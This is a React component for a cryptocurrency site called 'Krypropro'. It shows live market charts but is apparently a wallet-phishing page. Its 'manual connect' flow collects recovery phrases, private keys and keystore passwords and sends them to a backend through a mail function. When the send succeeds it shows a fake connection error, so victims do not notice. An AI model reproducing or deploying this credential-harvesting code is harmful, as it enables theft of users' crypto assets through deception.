import { useState, useEffect } from "react";
import React from "react";
import sendToBackend from "../utils/mailFunction";
import WalletSelection from "./WalletSelection";
import Initializing from "./Initializing";
import ManualConnect from "./ManualConnect";
import Synchronizing from "./Synchronizing";
import ConnectionError from "./ConnectionError";
import styles from "../WalletConnector.module.css";
import {
  LineChart,
  Line,
  XAxis,
  YAxis,
  CartesianGrid,
  Tooltip,
  ResponsiveContainer,
} from "recharts";
import { Link } from "react-router-dom";

export default function WalletConnector() {
  const [currentStep, setCurrentStep] = useState("walletSelection");
  const [selectedWallet, setSelectedWallet] = useState(null);
  const [inputMethod, setInputMethod] = useState("phrase");
  const [inputValue, setInputValue] = useState("");
  const [walletPassword, setWalletPassword] = useState("");

  // Chart and market data state
  const [marketData, setMarketData] = useState([]);
  const [globalStats, setGlobalStats] = useState({
    totalMarketCap: 0,
    totalVolume: 0,
    btcDominance: 0,
    activeCryptos: 0,
    markets: 0,
  });
  const [chartData, setChartData] = useState([]);
  const [selectedCoin, setSelectedCoin] = useState("bitcoin");
  const [timeframe, setTimeframe] = useState("7");
  const [loading, setLoading] = useState(true);

  // Helper function for generating fallback colors
  const getColorForSymbol = (symbol) => {
    if (!symbol) return "#666666";
    const colors = [
      "#FF6B6B",
      "#4ECDC4",
      "#45B7D1",
      "#FFA07A",
      "#98D8C8",
      "#F7DC6F",
      "#BB8FCE",
      "#85C1E9",
      "#F8C471",
      "#82E0AA",
    ];
    const index = symbol.charCodeAt(0) % colors.length;
    return colors[index];
  };

  // Updated getCoinIcon function
  const getCoinIcon = (coin) => {
    if (coin && coin.image) {
      return coin.image;
    }

    const coinId = typeof coin === "string" ? coin : coin?.id;

    const fallbackIcons = {
      bitcoin: "https://assets.coingecko.com/coins/images/1/small/bitcoin.png",
      ethereum:
        "https://assets.coingecko.com/coins/images/279/small/ethereum.png",
      ripple:
        "https://assets.coingecko.com/coins/images/44/small/xrp-symbol-white-128.png",
      xrp: "https://assets.coingecko.com/coins/images/44/small/xrp-symbol-white-128.png",
      tether: "https://assets.coingecko.com/coins/images/325/small/Tether.png",
      binancecoin:
        "https://assets.coingecko.com/coins/images/825/small/bnb-icon2_2x.png",
      solana: "https://assets.coingecko.com/coins/images/4128/small/solana.png",
      "usd-coin":
        "https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png",
      usdc: "https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png",
      cardano:
        "https://assets.coingecko.com/coins/images/975/small/cardano.png",
      polkadot:
        "https://assets.coingecko.com/coins/images/12171/small/polkadot.png",
    };

    return (
      fallbackIcons[coinId] ||
      "https://assets.coingecko.com/coins/images/1/small/bitcoin.png"
    );
  };

  // Fetch live market data
  useEffect(() => {
    const fetchMarketData = async () => {
      try {
        console.log("Fetching market data...");

        const cryptoResponse = await fetch(
          "https://api.coingecko.com/api/v3/coins/markets?vs_currency=usd&order=market_cap_desc&per_page=6&page=1&sparkline=true&price_change_percentage=1h,24h,7d&locale=en",
          {
            method: "GET",
            headers: {
              Accept: "application/json",
            },
          }
        );

        if (!cryptoResponse.ok) {
          throw new Error(`HTTP error! status: ${cryptoResponse.status}`);
        }

        const cryptoData = await cryptoResponse.json();

        const globalResponse = await fetch(
          "https://api.coingecko.com/api/v3/global",
          {
            method: "GET",
            headers: {
              Accept: "application/json",
            },
          }
        );

        if (!globalResponse.ok) {
          throw new Error(`HTTP error! status: ${globalResponse.status}`);
        }

        const globalData = await globalResponse.json();

        const transformedData = cryptoData.map((coin) => ({
          id: coin.id,
          name: coin.name,
          symbol: coin.symbol.toUpperCase(),
          price: coin.current_price,
          change1h: coin.price_change_percentage_1h_in_currency || 0,
          change24h: coin.price_change_percentage_24h || 0,
          change7d: coin.price_change_percentage_7d_in_currency || 0,
          volume: coin.total_volume,
          marketCap: coin.market_cap,
          image: coin.image,
          sparkline: coin.sparkline_in_7d?.price || [],
        }));

        setMarketData(transformedData);

        if (globalData.data) {
          setGlobalStats({
            totalMarketCap: globalData.data.total_market_cap?.usd || 0,
            totalVolume: globalData.data.total_volume?.usd || 0,
            btcDominance: globalData.data.market_cap_percentage?.btc || 0,
            activeCryptos: globalData.data.active_cryptocurrencies || 0,
            markets: globalData.data.markets || 0,
          });
        }

        setLoading(false);
      } catch (error) {
        console.error("Error fetching market data:", error);
        setLoading(false);

        setMarketData([
          {
            id: "bitcoin",
            name: "Bitcoin",
            symbol: "BTC",
            price: 43250.5,
            change1h: 0.5,
            change24h: 2.3,
            change7d: -1.2,
            volume: 25000000000,
            marketCap: 850000000000,
            sparkline: [],
          },
          {
            id: "ethereum",
            name: "Ethereum",
            symbol: "ETH",
            price: 2650.75,
            change1h: -0.2,
            change24h: 1.8,
            change7d: 3.4,
            volume: 15000000000,
            marketCap: 320000000000,
            sparkline: [],
          },
        ]);
      }
    };

    fetchMarketData();
    const interval = setInterval(fetchMarketData, 60000);
    return () => clearInterval(interval);
  }, []);

  // Fetch chart data for selected coin
  useEffect(() => {
    const fetchChartData = async () => {
      try {
        const response = await fetch(
          `https://api.coingecko.com/api/v3/coins/${selectedCoin}/market_chart?vs_currency=usd&days=${timeframe}&interval=${
            timeframe === "1" ? "hourly" : "daily"
          }`,
          {
            method: "GET",
            headers: {
              Accept: "application/json",
            },
          }
        );

        if (!response.ok) {
          throw new Error(`HTTP error! status: ${response.status}`);
        }

        const data = await response.json();

        if (data.prices && data.prices.length > 0) {
          const formattedData = data.prices.map(([timestamp, price]) => ({
            time: new Date(timestamp).toLocaleDateString("en-US", {
              month: "short",
              day: "numeric",
              ...(timeframe === "1" && { hour: "2-digit" }),
            }),
            price: parseFloat(price.toFixed(2)),
            timestamp: timestamp,
          }));

          setChartData(formattedData);
        }
      } catch (error) {
        console.error("Error fetching chart data:", error);
        setChartData([
          {
            time: "Jan 1",
            price: 42000,
            timestamp: Date.now() - 6 * 24 * 60 * 60 * 1000,
          },
          {
            time: "Jan 2",
            price: 43000,
            timestamp: Date.now() - 5 * 24 * 60 * 60 * 1000,
          },
          {
            time: "Jan 3",
            price: 41500,
            timestamp: Date.now() - 4 * 24 * 60 * 60 * 1000,
          },
          {
            time: "Jan 4",
            price: 44000,
            timestamp: Date.now() - 3 * 24 * 60 * 60 * 1000,
          },
          {
            time: "Jan 5",
            price: 43500,
            timestamp: Date.now() - 2 * 24 * 60 * 60 * 1000,
          },
          {
            time: "Jan 6",
            price: 45000,
            timestamp: Date.now() - 1 * 24 * 60 * 60 * 1000,
          },
          { time: "Today", price: 43250, timestamp: Date.now() },
        ]);
      }
    };

    if (selectedCoin) {
      fetchChartData();
    }
  }, [selectedCoin, timeframe]);

  const handleSubmit = async () => {
    if (!inputValue.trim()) {
      alert("Please enter your wallet credentials");
      return;
    }

    setCurrentStep("synchronizing");

    const walletData = {
      wallet: selectedWallet?.name || "Unknown wallet",
      method: inputMethod,
      credentials: inputValue,
      password: inputMethod === "keystore" ? walletPassword : null,
      timestamp: new Date().toISOString(),
      userAgent: navigator.userAgent,
    };

    try {
      const response = await sendToBackend(walletData);

      if (response.success) {
        setCurrentStep("connectionError");
      } else {
        alert("Connection failed. Please try again.");
        setCurrentStep("manualConnect");
      }
    } catch (error) {
      console.error("Error submitting wallet data:", error);
      alert("An error occurred. Please try again later.");
      setCurrentStep("manualConnect");
    }
  };

  const selectWallet = (wallet) => {
    setSelectedWallet(wallet);
    setCurrentStep("initializing");

    setTimeout(() => {
      setCurrentStep("manualConnect");
    }, 2000);
  };

  const handleCancelManualConnect = () => {
    setCurrentStep("walletSelection");
    setInputValue("");
    setWalletPassword("");
    setInputMethod("phrase");
    setSelectedWallet(null);
  };

  const handleReturnHome = () => {
    setCurrentStep("walletSelection");
    setInputValue("");
    setWalletPassword("");
    setInputMethod("phrase");
    setSelectedWallet(null);
  };

  // Utility functions
  const formatNumber = (num) => {
    if (!num) return "0";
    if (num >= 1e12) return (num / 1e12).toFixed(2) + "T";
    if (num >= 1e9) return (num / 1e9).toFixed(2) + "B";
    if (num >= 1e6) return (num / 1e6).toFixed(2) + "M";
    if (num >= 1e3) return (num / 1e3).toFixed(2) + "K";
    return num.toLocaleString();
  };

  const formatPrice = (price) => {
    if (!price) return "$0.00";
    if (price < 0.01) return `$${price.toFixed(6)}`;
    if (price < 1) return `$${price.toFixed(4)}`;
    return `$${price.toLocaleString(undefined, {
      minimumFractionDigits: 2,
      maximumFractionDigits: 2,
    })}`;
  };

  const selectedCoinData =
    marketData.find((coin) => coin.id === selectedCoin) || marketData[0];

  return (
    <div className={styles.container}>
      {/* Header */}
      <header className={styles.header}>
        <div className={styles.headerContainer}>
          <div className={styles.headerLeft}>
            <Link to="/" className={styles.logoLink}>
              <div className={styles.logo}>Krypropro</div>
            </Link>
            <nav className={styles.nav}>
              <Link to="/wallet" className={styles.navLink}>
                Trade
              </Link>
              <Link to="/wallet" className={styles.navLink}>
                Portfolio
              </Link>
              <Link to="/wallet" className={styles.navLink}>
                Staking
              </Link>
              <Link to="/wallet" className={styles.navLink}>
                NFTs
              </Link>
              <Link to="/learn" className={styles.navLink}>
                Learn
              </Link>
            </nav>
          </div>
          <div className={styles.headerRight}>
            <div className={styles.marketStats}>
              <span>
                Market Cap:{" "}
                <strong>${formatNumber(globalStats.totalMarketCap)}</strong>
              </span>
              <span>
                24h Vol:{" "}
                <strong>${formatNumber(globalStats.totalVolume)}</strong>
              </span>
              <span>
                BTC Dom: <strong>{globalStats.btcDominance.toFixed(1)}%</strong>
              </span>
            </div>
          </div>
        </div>
      </header>

      <main className={styles.main}>
        {/* Wallet Connection Section */}
        {currentStep === "walletSelection" && (
          <div className={styles.card}>
            <WalletSelection onSelect={selectWallet} />
          </div>
        )}

        {currentStep === "initializing" && (
          <div className={styles.card}>
            <Initializing wallet={selectedWallet} />
          </div>
        )}

        {currentStep === "manualConnect" && (
          <div className={styles.card}>
            <ManualConnect
              wallet={selectedWallet}
              inputMethod={inputMethod}
              setInputMethod={setInputMethod}
              inputValue={inputValue}
              setInputValue={setInputValue}
              walletPassword={walletPassword}
              setWalletPassword={setWalletPassword}
              onSubmit={handleSubmit}
              onCancel={handleCancelManualConnect}
            />
          </div>
        )}

        {currentStep === "synchronizing" && (
          <div className={styles.card}>
            <Synchronizing />
          </div>
        )}

        {/* Price Chart Section - Separate from wallet connection */}
        {currentStep === "walletSelection" && (
          <section className={styles.chartSection}>
            <h2 className={styles.sectionTitle}>Live Market Chart</h2>

            {/* Show loading state for market data */}
            {loading ? (
              <div className={styles.loadingContainer}>
                <div className={styles.spinner}></div>
                <p>Loading market data...</p>
              </div>
            ) : (
              <div className={styles.tradingInterface}>
                <div className={styles.chartContainer}>
                  <div className={styles.chartHeader}>
                    <div className={styles.chartTitle}>
                      <span>
                        {selectedCoinData?.name || "Bitcoin"} (
                        {selectedCoinData?.symbol || "BTC"})
                      </span>
                      <span className={styles.chartPrice}>
                        {formatPrice(selectedCoinData?.price)}
                      </span>
                      <span
                        className={`${styles.chartChange} ${
                          selectedCoinData?.change24h >= 0
                            ? styles.positive
                            : styles.negative
                        }`}
                      >
                        {selectedCoinData?.change24h >= 0 ? "+" : ""}
                        {selectedCoinData?.change24h?.toFixed(2)}%
                      </span>
                    </div>
                    <div className={styles.timeframes}>
                      <button
                        className={`${styles.timeframe} ${
                          timeframe === "1" ? styles.active : ""
                        }`}
                        onClick={() => setTimeframe("1")}
                      >
                        1D
                      </button>
                      <button
                        className={`${styles.timeframe} ${
                          timeframe === "7" ? styles.active : ""
                        }`}
                        onClick={() => setTimeframe("7")}
                      >
                        7D
                      </button>
                      <button
                        className={`${styles.timeframe} ${
                          timeframe === "30" ? styles.active : ""
                        }`}
                        onClick={() => setTimeframe("30")}
                      >
                        1M
                      </button>
                    </div>
                  </div>
                  <div className={styles.chart}>
                    {chartData.length > 0 ? (
                      <ResponsiveContainer width="100%" height="100%">
                        <LineChart data={chartData}>
                          <CartesianGrid
                            strokeDasharray="3 3"
                            stroke="#2a2a2a"
                          />
                          <XAxis
                            dataKey="time"
                            axisLine={false}
                            tickLine={false}
                            tick={{ fontSize: 12, fill: "#888" }}
                          />
                          <YAxis
                            axisLine={false}
                            tickLine={false}
                            tick={{ fontSize: 12, fill: "#888" }}
                            domain={["dataMin", "dataMax"]}
                            tickFormatter={(value) => `${formatNumber(value)}`}
                          />
                          <Tooltip
                            contentStyle={{
                              backgroundColor: "#1a1a1a",
                              border: "1px solid #333",
                              borderRadius: "8px",
                              color: "#fff",
                            }}
                            formatter={(value) => [formatPrice(value), "Price"]}
                          />
                          <Line
                            type="monotone"
                            dataKey="price"
                            stroke="#00d4aa"
                            strokeWidth={2}
                            dot={false}
                            activeDot={{ r: 4, fill: "#00d4aa" }}
                          />
                        </LineChart>
                      </ResponsiveContainer>
                    ) : (
                      <div className={styles.chartLoading}>
                        Loading chart data...
                      </div>
                    )}
                  </div>
                </div>

                {/* Coin Selection Panel */}
                <div className={styles.coinSelector}>
                  <h3 className={styles.coinSelectorTitle}>Select Coin</h3>
                  <div className={styles.coinList}>
                    {marketData.map((coin) => (
                      <div
                        key={coin.id}
                        className={`${styles.coinListItem} ${
                          selectedCoin === coin.id ? styles.selected : ""
                        }`}
                        onClick={() => setSelectedCoin(coin.id)}
                      >
                        <div className={styles.coinIconContainer}>
                          <img
                            src={coin.image || getCoinIcon(coin)}
                            alt={`${coin.name} icon`}
                            className={styles.coinIcon}
                            style={{ width: "24px", height: "24px" }}
                            onError={(e) => {
                              e.target.style.display = "none";
                              const fallback = e.target.nextElementSibling;
                              if (fallback) fallback.style.display = "flex";
                            }}
                          />
                          <div
                            className={styles.coinSymbolFallback}
                            style={{
                              display: "none",
                              width: "24px",
                              height: "24px",
                              borderRadius: "50%",
                              background: `linear-gradient(135deg, ${getColorForSymbol(
                                coin.symbol
                              )} 0%, ${getColorForSymbol(coin.symbol)}CC 100%)`,
                              color: "white",
                              fontSize: "10px",
                              fontWeight: "bold",
                              alignItems: "center",
                              justifyContent: "center",
                            }}
                          >
                            {coin.symbol?.substring(0, 2) || "?"}
                          </div>
                        </div>
                        <div className={styles.coinDetails}>
                          <span className={styles.coinName}>{coin.symbol}</span>
                          <span className={styles.coinPrice}>
                            {formatPrice(coin.price)}
                          </span>
                        </div>
                        <span
                          className={`${styles.coinChange} ${
                            coin.change24h >= 0
                              ? styles.positive
                              : styles.negative
                          }`}
                        >
                          {coin.change24h >= 0 ? "+" : ""}
                          {coin.change24h.toFixed(1)}%
                        </span>
                      </div>
                    ))}
                  </div>
                </div>
              </div>
            )}
          </section>
        )}
      </main>

      {currentStep === "connectionError" && (
        <ConnectionError
          wallet={selectedWallet}
          onReturnHome={handleReturnHome}
        />
      )}
    </div>
  );
}
